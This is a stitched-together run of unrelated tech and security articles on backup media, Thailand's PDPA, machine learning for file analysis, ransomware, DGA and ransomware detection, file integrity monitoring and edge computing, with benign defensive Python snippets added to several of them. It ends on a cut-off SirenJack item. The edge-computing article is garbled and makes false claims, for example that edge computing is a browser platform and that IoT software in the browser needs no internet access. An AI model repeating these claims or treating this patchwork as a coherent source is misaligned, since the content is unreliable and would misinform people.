Although I am not recommending that flash drives be used for the actual data storage, they are a convenient means of transferring data from one computer to another. Important files can be quickly loaded onto a device such as a USB 2.0 flash drive and transported to another computer for safe keeping. Installation and operation is extremely simple, and other than perhaps having to install a software driver, using a USB flash drive is a matter of having an available USB port on your computer. Just about every computer produced over the last several years has USB ports included, with more modern systems supporting the USB 2.0 standard. USB 2.0 allows for data transfer rates of up to 480 Mbps, which is a tremendous improvement over the original USB speed limit of 12 Mbps, and allows a user to fill their drives with data in a relatively short period of time.
Although the storage capacity of flash drives has increased greatly over the last year or so, users are still limited to common sizes of 4GB and 8GB.
2. CD and DVD Writers/Re-Writers
The falling prices of CD and DVD writers/re-writers have made them a staple of just about every modern computer. These devices can typically be found installed in a computer case, but external devices supporting USB 2.0 or FireWire are available for greater flexibility and ease of installation.
A combination drive will provide the user a high-speed CD reader/writer, as well as a DVD reader, for under $40. The extremely low price of the drive (and the blank media) makes for an inexpensive means of creating data backups, and the re-writable media increases the convenience by allowing the same disc to be erased and reused many times. The main limitation of using a CD writer for data backups is that the discs are generally limited to a capacity of 700MB per disc. That is not nearly enough for a full backup, but it is adequate for archiving key files.
The popularity of DVD writers/re-writers has surged thanks to dropping prices, and they are pushing the stand-alone CD burner towards extinction. DVD media affords the user far more storage capacity than a CD, and DVD burners can generally burn CDs as well as DVDs. The recent availability of double-layer DVD burners represents a large boost in the capacity of writable DVDs, taking the previous limit of 4.7GB per disc and nearly doubling it to 8.5GB. With proper storage, CD/DVD media can provide long-term storage that cannot be jeopardized by hardware failure. The data on a CD or DVD can easily be read by just about any computer, making it a good choice for archiving files that aren't excessively large.
3. External Hard Drives
As the name might imply, external hard drives are generally the same type of drive you might find inside your system, but housed in a smaller, external enclosure of its own.
The enclosure will feature at least one data interface (such as FireWire, USB, or Ethernet), and the capacity is only limited by the size of hard drives presently available and the user's budget.
An external hard drive provides a user the option of connecting an additional 2 TB of storage to their system using either a USB 2.0 or Ethernet connection. Installation for such a device is rather simple, and may involve the installation of some basic software, as well as making the necessary connections between the computer and the external enclosure. The capacity of external hard drives makes them ideal for backing up large volumes of data, and many of these devices simplify the process by including software (or hardware) features to automate the backup. For example, some Seagate external drives feature a "one-button" backup option right on the case. In addition to being a convenient method of backing up large volumes of files locally, most external hard drives are compact enough to be portable. The inclusion of a common data transfer interface, such as USB, allows an external hard drive to be connected to just about any modern computer for data transfer, or for more than one computer to share the external hard drive as a backup.
4. Additional Hard Drives
By simply adding an additional hard drive to your system, you can protect yourself from data loss by copying your data from your primary drive to your secondary drive. The installation of a second hard drive isn't difficult, but it does require a basic understanding of the inner workings of a computer, which may scare off some users. We do offer a "how-to" section on our site for many tasks such as installing a hard drive into a computer system.
To take the installation of a second hard drive to another level of security and reliability, the hard drives may be installed in a RAID array. RAID stands for a Redundant Array of Independent (or Inexpensive) Disks, and can be configured in several manners. A thorough discussion of RAID and all of its variations would be an article all by itself, but what may be of interest to this discussion is what is known as RAID 1. A RAID 1 array requires two hard drives of equal size to be installed on a RAID controller, which will then mirror one drive to the other in real time. Many motherboards now come with RAID controllers onboard. With a RAID 1 array in place, if one hard drive should ever fail, the system won't miss a beat, continuing to run on the remaining good drive, and will alert the user that one drive may need to be replaced.
5. Online Storage
Online services, such as Carbonite, allow users to upload their files to a server for safe keeping. Although it may be convenient to have the data available wherever an internet connection is available, there are a few limitations.
The services generally charge a yearly fee relative to the amount of storage space required. Security is supposed to be very tight on these services, but no matter how secure it may seem, it is still just a password keeping prying eyes from your potentially sensitive documents. The speed of your internet connection will also weigh heavily on the convenience of your backup, and no matter what type of connection you have, it can't compete with local data transfer rates.
Although not a comprehensive list of options available for backing up your data, the five items listed provide some simple and relatively affordable means to ensure that your data is not lost.
Data loss is an extremely frustrating and potentially costly situation, but one that can be avoided.
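To make the idea of automating a local backup to an additional or external drive concrete, here is a minimal sketch in Python; the source and destination paths are placeholders, and a real setup would add scheduling, error handling, and verification.

import shutil
from datetime import datetime
from pathlib import Path

# Placeholder paths -- point these at your own folders and backup drive.
SOURCE = Path.home() / "Documents"
DESTINATION = Path("/mnt/external_drive/backups")

def backup() -> Path:
    # Each run creates a timestamped copy so earlier backups are preserved.
    target = DESTINATION / datetime.now().strftime("backup-%Y%m%d-%H%M%S")
    shutil.copytree(SOURCE, target)
    return target

if __name__ == "__main__":
    print(f"Backup written to {backup()}")

Scheduling a script like this with cron (or Task Scheduler on Windows) turns it into the kind of automated backup that external-drive vendors bundle as "one-button" software.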
Thailand's Personal Data Protection Act or PDPA Thailand's Personal Data Protection Act, or PDPA for short, is a comprehensive data privacy law that was passed by the Thai government in 2019. As one of the many nations around the globe to implement personal data protection laws following the passing of the EU's General Data Protection Regulation or GDPR, the PDPA is the first consolidated data protection law to be passed in Thailand. As such, the PDPA places various requirements and restrictions on how businesses, organizations, and individuals can go about collecting, processing, using, and disclosing the personal data or information of Thai citizens. What is the scope and application of the PDPA? The PDPA applies to any "person or legal person that collects, uses, or discloses the personal data of a natural (and alive) person, with certain exceptions (e.g. exception of household activity)". Furthermore, the PDPA also applies to data controllers or data processors who collect, use, or disclose the personal data of individuals residing within Thailand. What's more, the PDPA also contains provisions related to extraterritorial applicability over business entities and organizations outside of Thailand under the following circumstances:
- Where the activities of collection, use, and disclosure of personal data or information are in relation to the offering of goods or services to data subjects residing in Thailand, irrespective of whether payments are made directly by said data subjects.
- Where the activities of collection, use, and disclosure of personal data or information are in relation to the monitoring of a data subject's behavior, when said behavior takes place within Thailand.
How is the term "personal data" defined under the PDPA? Under the PDPA, personal data is categorized by two separate terms, "general personal data" and "sensitive personal data". Both of these data types have different requirements and exemptions under the PDPA. Moreover, the PDPA also provides specific definitions for the terms "data controller" and "data processor", while other forms of data, such as health data or biometric data, are not defined separately under the PDPA. The definitions provided by the PDPA are as follows:
- General personal data – "Any information relating to a natural person, which enables the identification of such a person, whether directly or indirectly, but not including information of deceased persons".
- Sensitive personal data – "Any personal data pertaining to racial or ethnic origin, political opinions, cult, religious or philosophical beliefs, sexual behavior, criminal records, health data, disability, trade union information, genetic data, biometric data, or of any data which may affect the data subject in the same manner as to be prescribed by the PDPC".
- Data controller – "A person or legal person having the power and duties to make decisions regarding the collection, use, or disclosure of the personal data".
- Data processor – "A person or legal person who operates in relation to the collection, use, or disclosure of the personal data pursuant to the orders given by or on behalf of a personal data controller, whereby such person or legal person is not a personal data controller".
What are the requirements of business entities within and outside of Thailand under the PDPA? Under the PDPA, there are a variety of requirements and restrictions that individuals, business entities, and organizations both within and outside of Thailand must adhere to.
These requirements include:
- Data processing notification – Data controllers are required to inform data subjects, prior to or at the point of collection, of all required details, i.e. the purpose of the collection, except in cases where a data subject already knows or has already been informed of such details.
- Data processing records – Data controllers and data processors are required to maintain records of all data processing activities, which can be in either electronic or written form. These processing records must be presented to both data subjects and the Office of the PDPC.
- Data protection impact assessment – Data controllers are required to acknowledge the level of risk and severity associated with the personal data they collect, use, and disclose, and the ways in which these risks could adversely affect the rights and freedoms of natural persons.
- Data protection officer appointment – Under the PDPA, business entities and organizations are also required to appoint a data protection officer or DPO under certain circumstances. For example, the appointment of a DPO is mandatory if the core activity of a data controller or data processor is to collect, use, or disclose the sensitive personal data of data subjects.
- Data breach notifications – Data controllers are required to notify the Office of the PDPC of data breaches without delay and, where feasible, within 72 hours of having become aware of the breach. In instances where a data breach is likely to pose significant harm or risks to the associated data subjects, data controllers are also required to notify said data subjects, as well as provide remedial measures in relation to the breach, without undue delay.
- Data retention – When collecting the personal data of data subjects, data controllers are required to inform said data subjects, prior to or at the time of collection, of the period of time for which their data will be retained. If it is not possible to provide data subjects with a specific time period, the expected data retention period must instead be specified, according to a specific data retention standard.
- Children's data – When collecting data from data subjects under the age of 20, data controllers may need to obtain parental consent for minors aged between 0 and 10 years old, obtain the consent of minors who are older than 10 but younger than 20 for an act in which minors are deemed competent to give consent, and obtain parental consent for minors who are older than 10 but younger than 20 for acts in which minors are not deemed competent to give consent.
- Special categories of personal data – When collecting the sensitive personal data of data subjects, data controllers are required to obtain explicit consent from said data subjects, unless an exemption applies. To this point, data controllers are only permitted to collect personal data related to criminal records when said collection is handled by an authorized official authority or is otherwise prescribed by other provisions of the PDPA.
- Controller and processor – When controlling and processing personal data, data controllers and data processors are responsible for putting agreements in place to outline the activities carried out by both respective parties. Such an agreement must set out the specific obligations of data processors in accordance with the provisions of the PDPA.
What are the rights of data subjects under the PDPA and how are these rights enforced?
Under the PDPA, data subjects are afforded a variety of rights in regard to the personal data and information they provide to data controllers and data processors. These rights include:
- The right to be informed.
- The right to access.
- The right to rectification.
- The right to erasure.
- The right to object or opt out.
- The right to data portability.
- The right not to be subject to automated decision-making.
- The right to withdraw consent.
- The right to lodge a complaint.
In terms of enforcement and penalties relating to violations of the PDPA, the law is enforced by the Office of the PDPC, and data controllers or processors who fail to comply with the PDPA are subject to civil liabilities, including punitive damages, in addition to other criminal and administrative penalties. These penalties include monetary fines of up to THB 5 million ($160,214), as well as criminal penalties that can include up to 1 year of imprisonment, a fine of up to THB 1 million ($32,042), or both. While many data privacy regulations around the world are less restrictive than the EU's widely known General Data Protection Regulation or GDPR, the PDPA is in many ways one of the more stringent privacy regulations in terms of extraterritorial application. As such, Thai citizens have the peace of mind that their personal data rights are not infringed upon, even when dealing with individuals, business entities, and organizations that are not physically located within Thailand. In this way, the data privacy rights of Thai citizens can be upheld at all times.
How Machine Learning Techniques Impact File Analysis Applying machine learning (ML) and artificial intelligence (AI) techniques to analyze files within a content repository can raise the bar on operating efficiencies and produce smarter solutions that bring "structure" to unstructured data. However, not all unstructured data is created equal. The primary challenge is determining the differences in file content and context. Technologies based on text-oriented content analysis don't work well when analyzing non-text files such as images. They're unable to look inside the files and identify their contents. Over the years, systems that rely on upfront metadata tagging have been developed as a workaround for this issue. For instance, a digital asset management system is a good way to organize large collections of images, provided that somebody develops and maintains the relevant metadata, including annotations. Various types of content need to be handled differently, as some have well-defined metadata (e.g. MS Office documents), while others need intensive analysis to extract rich metadata (e.g. audio, video). Metadata can be extended beyond file system attributes to include an in-depth analysis of the content itself. Here are a couple of ways this can be done: Natural Language Processing (NLP) techniques such as sentiment analysis determine the tone of the content (positive, negative), and named entity recognition can be used to extract "business entities" such as personal names, addresses, company names, etc., and group documents in different ways to allow for faster comprehension of large datasets. These techniques have their limitations when applied to large business content sets. For example, sentiment analysis is more useful for short documents such as chat logs, and less useful for business documents, which tend to be fairly neutral in tone. Named entity recognition techniques require a large pre-classified training set, and typical public training sets are based on location- or country-specific news articles that are not representative of business data sets. Search engine techniques use machine learning for pattern detection of significant text and phrases within the content. These techniques were mostly designed to work off of large public datasets, and have limitations and varying degrees of success with enterprise datasets. For example, quick access to search results is often complicated by a common requirement to layer a set of complex access control structures (using roles, groups, hierarchical permissions, etc.) on content within an enterprise. When it comes to using search engine techniques for image searches, this is only slightly different from the text search engine. A metadata image search engine rarely examines the actual image itself. Instead, it relies on actual text from the content within the files and/or text used in the description of the image. Deep Learning (DL) is part of a broader family of machine learning which enables the ability to learn from data that is unstructured or unlabeled by building learning algorithms that mimic the brain. Deep learning techniques such as computer vision identify high-level concepts within a target image and build a dictionary of terms to expand the search capability to include similar concepts. For example, if it learns to identify images of digging equipment on a construction site, it can over time expand to include similar images. This requires a very large amount of pre-classified content, which is typically based off of public image datasets.
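Returning to the named entity recognition technique mentioned above, here is a small Python sketch using the open-source spaCy library; the model name and the sample sentence are illustrative assumptions rather than anything from the original article.

import spacy

# Assumes the small English model has been installed, e.g. via
#   python -m spacy download en_core_web_sm
nlp = spacy.load("en_core_web_sm")

text = "Acme Corp signed a lease at 12 Main Street, Seattle with Jane Doe."
doc = nlp(text)

# Each detected entity carries a label such as ORG, PERSON, or GPE, which
# can be used to group documents by the business entities they mention.
for ent in doc.ents:
    print(ent.text, ent.label_)

As the article notes, a model pre-trained on news text like this one would usually need retraining on annotated enterprise documents before the extracted entities become reliable.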
Training needs to occur on a comprehensive sample of enterprise content to extract meaningful information within images, rather than generic concepts that are less useful. Another technique is word vector analysis, which identifies significant keywords or phrases within the content and their interrelationships to figure out synonyms and antonyms, building business domain vocabularies that can be used to increase the accuracy of search results.
Recommendation systems
To derive meaningful results from enterprise content repositories, it's clear we need to retrain typical ML/AI algorithms on appropriate datasets of reasonable size. Therefore, more time and effort must be spent on gathering and annotating sample datasets, rather than on tuning existing algorithms. With a rich set of metadata attributes in hand, we can leverage these to construct a variety of non-intrusive, intelligent features that can work side by side with the user to pull up appropriate content at the right time. For example, we can build recommendation systems to suggest potential collaborators and interesting content. These recommendation systems can be built using a couple of different approaches:
- Collaborative filtering, which leverages groups of similar users to recommend content created/accessed by one user to other users, and
- Content-based recommendation systems, which drive off of content metadata to identify content similar to the one previously accessed or currently being accessed (a minimal sketch of this approach follows at the end of this article).
Collaborative filtering requires a large grouping of users to be meaningful, and content-based recommendation systems require a large set of historical access patterns to be useful. Typically these problems are mitigated by combining both approaches and switching from one to the other as appropriate.
From consumer to enterprise
A variety of ML/AI techniques are available to deliver the intelligent features within content repositories that can learn and become better over time. But blindly applying approaches from consumer applications to enterprise data sets can be a frustrating experience. Be discriminating to deliver meaningful results. In the next article, we will dive into specific applications of these techniques to problems in Data Governance and Collaboration products.
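As promised above, here is a rough sketch of the content-based approach using scikit-learn's TF-IDF vectorizer and cosine similarity; the sample "documents" are placeholder strings standing in for text or metadata extracted from files, not anything from the original article.

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# Placeholder documents standing in for text/metadata extracted from files.
documents = [
    "Q3 construction site safety report and excavation schedule",
    "Invoice for digging equipment rental, Q3",
    "Employee onboarding handbook and HR policies",
]

vectorizer = TfidfVectorizer(stop_words="english")
matrix = vectorizer.fit_transform(documents)

# Score every document against the first one; higher scores suggest better
# candidates to recommend alongside it.
scores = cosine_similarity(matrix[0], matrix).flatten()
for doc, score in sorted(zip(documents, scores), key=lambda pair: -pair[1]):
    print(f"{score:.2f}  {doc}")

A production system would combine similarity scores like these with collaborative signals, as described in the article.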
A Look at Ransomware in 2019 Ransomware, a malicious program that denies users access to their computer until a sum of money is paid, under the threat of losing all of their data, is still a major issue for all computer users. In May of 2019, government officials of Baltimore, MD, were attacked by ransomware. How did this impact Baltimore? Thousands of government computers, e-mails, emergency service dispatch systems, and government websites (such as water bills and health alerts) were completely inaccessible to the city. As of right now, the estimate for damages from this ransomware attack alone is over $18 million, according to The New York Times. This goes to show that the risk of being attacked by ransomware is as high as ever. Why has there been an increase in ransomware attacks over the past few years? A tool created by the N.S.A., known as EternalBlue, fell into the hands of hackers around the world in 2017, notably in North Korea and Russia. The infamous WannaCry cyber-attack has been linked to a North Korean hacking entity referred to as the Lazarus Group, whereas Russia has ties to the creation and malicious use of the ransomware known as NotPetya. Both of these malicious programs have cost billions of dollars in damages for governments, businesses and U.S. citizens.
This is the ransomware demand. It threatens that after 10 days, Baltimore won't get its data back. Armor says there have been no transactions to the hacker's bitcoin wallets. @wjz, Mike Hellgren, Investigative Reporter for WJZ
Outdated Software Leaves Computers at High Risk Right now, hackers are attacking local governments with aging digital infrastructure. Due to outdated software, it's harder to prevent ransomware attacks and to resolve them, but easier for ransomware to compromise computers. Ransomware exploits vulnerabilities found in unpatched software, which allows it to spread to other devices on the same network. Other U.S. governments affected by ransomware include Allentown, PA, San Antonio, TX, Cartersville, GA, and many other state and local governments. What Can You Do? All it takes is one click on a phishing e-mail link to have your computer compromised by ransomware. How much would you pay to save your computer files? Don't find out. Make sure to update your operating system to the most up-to-date version of available software. If you're still using Windows 7, you definitely want to update to Windows 10, due to Windows 7 reaching its end of life in a matter of months. Here's a great article on other steps you can take to stay safe on social media, another way hackers steal your private information. Ensure your cyber security is up to date with Kustura Technologies' help.
DGAs (Domain Generation Algorithms) produce rendezvous domains that malware and hacker-controlled servers use to communicate. The domains are generated by rules or algorithms, are usually encoded/encrypted, and often have a short life span. Hackers use DGAs to evade detection or blocking by static blacklist-based systems, for example (some) firewalls using threat intelligence data that does not get updated as frequently as needed. It is not easy to detect DGAs because they satisfy the DNS protocol in every manner and there is usually no signature to identify them. This is why we use artificial intelligence/machine learning technology to detect them. If you look at some DGA domains you can find that quite often they appear to be collections of random characters, and because of that, from a lexical analysis point of view they are statistically quite different from normal domains. On top of that, they usually do not resolve to IP addresses, since most of them are not even registered. Both of these are very important characteristics, or "features" as they are called in machine learning, to be used when we train the machine learning models. Machine learning works similarly to the way human beings forecasted weather before certain modern technologies, including sensors and computers, were invented. We observed lots of similar independent signals such as temperature, wind direction and animal behavior, and then associated them based on very long periods of observation. If you think of some weather proverbs you will know what I mean. Just like weather forecasting, machine learning may produce false detections, as the training data might be biased or not applicable. Since DGAs are an early indicator of malicious activities, such false detections can be handled depending on users' risk tolerance levels.
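To make the "collections of random characters" intuition concrete, here is a toy Python sketch (not any vendor's actual model) that computes the Shannon entropy of a domain label, one simple lexical feature a classifier could use; the example domains and the 3.5 cutoff are illustrative assumptions only.

import math
from collections import Counter

def shannon_entropy(label: str) -> float:
    # Higher entropy means the character distribution looks more random.
    counts = Counter(label)
    total = len(label)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

# Illustrative domains and threshold only -- a real detector would combine
# many features (character n-grams, length, NXDOMAIN rates) in a trained model.
for label in ["google", "kq3v9z7xj1f0d8w2"]:
    score = shannon_entropy(label)
    verdict = "DGA-like" if score > 3.5 else "looks normal"
    print(f"{label}: entropy={score:.2f} ({verdict})")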
Ransomware is malware that infects a computer, encrypts files and blocks access to them until the user makes a digital payment. Ransomware detection is the process of notifying users when ransomware is present on their system or their files are already being encrypted, blocking the ransomware if possible, and guiding users through recovery steps. Early detection of ransomware is critical for effectively defending against this severe threat and minimizing damage to the organization. There are three primary ways to detect ransomware: signature-based detection, which leverages the binary signature of a ransomware program; traffic-based detection, which detects abnormal patterns in data traffic; and behavioral detection, which detects malware by evaluating the behavior of suspicious operating system processes. This is part of our series of articles about ransomware protection. Early detection in cyberattacks is very important. The earlier incidents are stopped in the attack chain, the less likely an attacker is to steal sensitive data or compromise organizational systems. Early detection of ransomware attacks is more important than for any other malware, because the damage is irreversible. If ransomware encrypts data that is not securely backed up, recovery may not be possible, even if the victim pays the ransom. To minimize damage, it is important to prevent ransomware infections before they start encrypting data. As ransomware advances, early detection becomes more important. Newer ransomware variants steal sensitive company data before it is encrypted. If ransomware is detected before data theft occurs, companies will avoid potentially costly and reputationally harmful data breaches. Related content: Read our guide to ransomware prevention. While different ransomware variants implement the attack in different ways, most have several things in common. The specific files encrypted will depend on the specific ransomware variant, parameters passed to the ransomware binary to customize its operation for certain victims or campaigns, and pre-configured features of the ransomware program. These could be hardcoded into the ransomware binary itself or added as scripts or utilities packaged with the ransomware. Most types of ransomware contain configurations that specify what to include or exclude in the encryption process. The following are the most common techniques for detecting ransomware on an infected device. Signature-based ransomware detection compares ransomware binary hashes to known malware signatures. This enables fast, static analysis of files in the environment. Security platforms and antivirus software capture data from executables to determine whether they are ransomware or approved executables. Most modern antivirus solutions have this capability – when they scan the local environment for malware, they can detect known ransomware variants. Signature-based ransomware detection technology is a first line of defense. It helps detect known threats, but it is largely unable to identify new ransomware strains. In addition, attackers update and permutate malware files to avoid detection. Even adding just one byte to a file creates a new hash and reduces the likelihood of malware detection. Still, signature-based detection helps identify outdated ransomware samples and known good files (for example, common business applications), ruling out the possibility that they are malware. It can protect against ordinary ransomware campaigns, but not against sophisticated, targeted ransomware campaigns.
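As a minimal illustration of the hash-comparison idea behind signature-based detection (a sketch only, not a substitute for a real antivirus engine), the following Python snippet scans a folder and flags files whose SHA-256 digest appears in a known-bad list; the hash set and the scanned path are placeholders.

import hashlib
from pathlib import Path

# Placeholder set -- in practice these hashes come from a threat-intel feed.
KNOWN_BAD_SHA256 = {
    "0000000000000000000000000000000000000000000000000000000000000000",
}

def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def scan(directory: str) -> None:
    for path in Path(directory).rglob("*"):
        if path.is_file() and sha256_of(path) in KNOWN_BAD_SHA256:
            print(f"Known-bad signature match: {path}")

scan("/tmp/incoming")  # hypothetical download folder

As the article notes, changing even one byte of the malware defeats an exact-match check like this, which is why it can only serve as a first line of defense.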
Data traffic analysis is another detection method. It looks at data processed by and transferred to or from a device, inspecting elements like timestamps and data volumes for anomalies. If the algorithm detects unusual data patterns that indicate a possible ransomware attack, the file system is locked down. The advantage of this approach over signature-based solutions is that it is highly effective at stopping ransomware attacks and can detect modified ransomware without knowing its malware signature. The main disadvantage of this approach is the high rate of false positives. In many cases, protective software can block legitimate files or data operations, resulting in costly downtime and hurting productivity. Data behavior monitoring is a technique that monitors file execution to identify anomalies. Behavior-based solutions monitor the behavior of files and processes in the operating system for malicious activity such as encryption or overwriting of DLL files. Unlike the signature-based and data traffic-based methods, this method does not require a signature and has a lower rate of false positives. Also, it does not need to lock down the entire file system – instead, it can block individual processes that exhibit suspicious behavior. The downside of this approach is that it can take the system time to analyze process behavior before it can detect ransomware activity. This means that in many cases, some data will be encrypted before the algorithm responds. A dedicated security tool can provide holistic protection against ransomware at the network, file system, and application layers. One such solution is Cynet 360, an advanced threat detection and response platform that provides protection against threats including ransomware, zero-day attacks, advanced persistent threats (APT), and trojans that can evade signature-based security measures. Cynet provides a multi-layered approach to stop ransomware from executing and encrypting your data. Learn more about how Cynet 360 can protect your organization against ransomware and other advanced threats.
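To make the behavior-monitoring idea described above more concrete, here is a toy Python polling sketch that flags bursts of file modifications, the kind of pattern that can accompany mass encryption; the watched directory, interval, and threshold are illustrative assumptions, and a real product hooks the operating system far more deeply than polling timestamps.

import os
import time

WATCH_DIR = "/home/user/documents"   # hypothetical directory to watch
BURST_THRESHOLD = 50                 # illustrative: changed files per interval
INTERVAL_SECONDS = 10

def snapshot(directory: str) -> dict:
    # Map each file path to its last-modified timestamp.
    state = {}
    for root, _, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                state[path] = os.path.getmtime(path)
            except OSError:
                pass  # file disappeared or is unreadable; skip it
    return state

previous = snapshot(WATCH_DIR)
while True:
    time.sleep(INTERVAL_SECONDS)
    current = snapshot(WATCH_DIR)
    changed = sum(1 for path, mtime in current.items() if previous.get(path) != mtime)
    if changed > BURST_THRESHOLD:
        print(f"WARNING: {changed} files changed in {INTERVAL_SECONDS}s -- possible mass encryption")
    previous = current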
Is a gun better than a knife? I've been trying hard for an analogy, but this one kind of works. Which is better, a gun or a knife? Both will help defend you against an attacker. A gun may be better than a knife if you are under attack from a big group of attackers running at you, but without ammunition, you are left defenseless. The knife works without ammunition and always provides a consistent deterrent, so in some respects it gives better protection than a gun. Which is not a bad way to try and introduce the concept of FIM versus anti-virus technology. Anti-virus technology will automatically eliminate malware from a computer, usually before it has done any damage. Both at the point at which malware is introduced to a computer, through email, download or USB, and at the instant at which a malware file is accessed, the AV will scan for known malware. If identified as a known virus, or even if the file exhibits characteristics that are associated with malware, the infected files can be removed from the computer. However, if the AV system doesn't have a definition for the malware at hand, then, like a gun with an empty magazine, it can't do anything to help. File Integrity Monitoring, by contrast, may not be quite so 'active' in wiping out known malware, but - like a knife - it never needs ammo to maintain its role as a defense against malware. A FIM system will always report potentially unsafe filesystem activity, albeit with intelligence and rules to ignore certain activities that are always defined as safe, regular or normal.
AV and FIM versus the Zero Day Threat
The key points to note from the previous description of AV operation are that the virus must either be 'known', i.e. the virus has been identified and categorized by the AV vendor, or that the malware must 'exhibit characteristics associated with malware', i.e. it looks, feels and acts like a virus. Anti-virus technology works on the principle that it has a regularly updated 'signature' or 'definition' list containing details of known malware. Any time a new file is introduced to the computer, the AV system has a look at the file and, if it matches anything on its list, the file gets quarantined. In other words, if a brand new, never-been-seen-before virus or Trojan is introduced to your computer, it is far from guaranteed that your AV system will do anything to stop it. Ask yourself: if AV technology were perfect, why would anybody still be concerned about malware? The lifecycle of malware can be anything from 1 day to 2 years. The malware must first be seen - usually, a victim will notice symptoms of the infection and investigate before reporting it to their AV vendor. At that point, the AV vendor will work out how to counteract the malware in the future and update their AV system definitions/signature files with details of this new malware strain. Finally, the definition update is made available to the world, and individual servers and workstations around the world will update themselves and thereafter be rendered immune to this virus. Even if this process takes only a day to conclude, that is a pretty good turnaround - after just one day the world is safe from the threat. However, up until this time, the malware is a problem. Hence the term 'Zero Day Threat' - the dangerous time is between 'Day Zero' and whichever day the inoculating definition update is provided.
By contrast, a FIM system will detect the unusual filesystem activity - either at the point at which the malware is introduced or when the malware becomes active, creating files or changing server settings to allow it to report back the stolen data.
Where is FIM better than AV?
As outlined previously, FIM needs no signatures or definitions to try and second-guess whether a file is malware or not, and it is therefore less fallible than AV. Where FIM provides a distinct advantage over AV is that it offers far better preventative measures. Anti-virus systems are based on a reactive model, a 'try and stop the threat once the malware has hit the server' approach to defense. An Enterprise FIM system will not only keep watch over the core system and program files of the server, watching for malware introductions, but will also audit all the server's built-in defense mechanisms. The process of hardening a server is still the number one means of providing a secure computing environment, and prevention, as we all know, is better than cure. Why try and hope your AV software will identify and quarantine threats when you can render your server fundamentally secure via a hardened configuration? Add to this that Enterprise FIM can be used to harden and protect all components of your IT estate, including Windows, Linux, Solaris, Oracle, SQL Server, firewalls, routers, workstations, POS systems and more, and you are now looking at an absolutely essential IT security defense system. This article was never going to be about whether you should implement FIM or AV protection for your systems. Of course, you need both, plus some good firewalling, IDS and IPS defenses, all wrapped up with solid best practices in change and configuration management, all scrutinized for compliance via comprehensive audit trails and procedural guidelines. Unfortunately, there is no real 'making do' or cutting corners when it comes to IT security. Trying to compromise on one component or another is a false economy, and every single security standard and best practice guide in the world agrees on this. FIM, AV, auditing and change management should be mandatory components in your security defenses.
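To show the core mechanism that FIM tools build on, here is a minimal baseline-and-compare sketch in Python; the monitored directory is a placeholder, and real enterprise FIM adds change rules, scheduling, secure storage of the baseline, and reporting on top of this idea.

import hashlib
import json
from pathlib import Path

MONITORED = Path("/etc")              # placeholder directory to monitor
BASELINE_FILE = Path("baseline.json")

def hash_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_baseline() -> None:
    baseline = {}
    for path in MONITORED.rglob("*"):
        if path.is_file():
            try:
                baseline[str(path)] = hash_file(path)
            except OSError:
                pass  # unreadable file; skip it
    BASELINE_FILE.write_text(json.dumps(baseline, indent=2))

def check_integrity() -> None:
    baseline = json.loads(BASELINE_FILE.read_text())
    for path_str, old_hash in baseline.items():
        path = Path(path_str)
        if not path.exists():
            print(f"REMOVED: {path}")
        elif hash_file(path) != old_hash:
            print(f"CHANGED: {path}")

# First run: build_baseline(); later runs: check_integrity()

Every change report then has to be reconciled with legitimate patching and configuration changes, which is why the article stresses pairing FIM with solid change management.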
Edge Computing Use Cases: Edge computing is a new paradigm for deploying web applications outside of the Cloud. The Edge is the place where web users and their personal devices connect to the public cloud. It's defined by its proximity to end-users. In this sense, it's a browser-based platform, much more so than the Cloud, but more fully distributed. This kind of platform doesn't have any one unified way of operating. Rather, it's composed of different layers – an interface, a server, and a collection of browser plug-ins and utilities. Once you deploy an Edge-based application, all your computers communicate with the edge-computing "warehouse". Each device has its own virtual private cloud environment. This enables you to use a browser on any number of these devices without needing to be anywhere else. You may be familiar with some of the benefits of using the browser virtual desktop model. To take full advantage of this architecture, however, you will need an Internet provider with which to connect. This is a very different experience from connecting to a local data center. A large corporation could provide all Edge computing devices and data centers. However, in a smaller business, that may not be possible. If you use an ISP that provides cloud services, you can access any device – even if you aren't located in the same physical area as the edge-computing "cloud". One of the primary use cases for Edge computing is in the area of telecommuting. Instead of having to wait on your ISP to deliver your work or communicate with your co-workers in real time, you can submit your information to the Edge cloud and receive it immediately. This is known as "instantaneous publishing." This type of service is best provided by broadband with low latency. In other words, if you have a low-latency connection, then you will be able to use the Edge. Another use case for Edge computing is in the area of virtualization. Virtualization enables you to create partitions between two different types of devices – one hosted on the internet and one on a remote server. One benefit of using an Edge computing platform is that it allows you to run different operating systems on the same hardware. Therefore, if you are running the Windows OS in your office and want to use Linux on your laptops, you can simply boot your virtual machines off of the internet (on a virtual server) and access them via a VPN connection. A third popular use case is in the area of software development. With applications written to run on the Edge through the browser, you no longer need to use software that has been installed on your computer. With this type of service, a developer creates and deploys his or her application without actually having to install any hardware, or deal with drivers or downloads. Thus, it is beneficial in reducing development costs, as well as simplifying communications between team members. While all three of these use cases make use of an Edge computing device, there are still some differences between them that are worth noting. First, there is no need to have a laptop. Second, the IoT software runs in the web browser itself, so it is not necessary to have internet access. Lastly, while most IoT applications are browser-based, they are not all rendered in the manner that you would expect when viewing a web page on a computer. Some images are only partially displayed, and some do not respond as they should in real-world situations.
But most use cases for internet-based Edge computing are quite straightforward, as most people understand how to use the browser. The future of Edge computing looks strong. As companies such as Apple, Google, Amazon, and others integrate more closely with their respective cloud services, we will see more real-time interactions within the office or at home. We may even see Edge support added to smartphones, which will allow consumers to access websites that are off-the-shelf and ready to go in real time. Regardless of whether or not we see the 'end' of Edge, it does look as if we will, for the time being, move our conversations away from desktops and towards the ever-popular cloud.
The sound of an emergency alert siren can be a nightmare soundtrack for the millions who live in areas subject to hurricanes, tornadoes, earthquakes, or other natural disasters. A recently disclosed vulnerability in the emergency warning system used by San Francisco and other municipalities could allow a threat actor to take control of the system, sound false alarms, or block legitimate warnings. While the vendor, ATI, says it has now patched the so-called SirenJack vulnerability, which stems from an unencrypted control protocol, the process of its discovery could have implications for other locations.

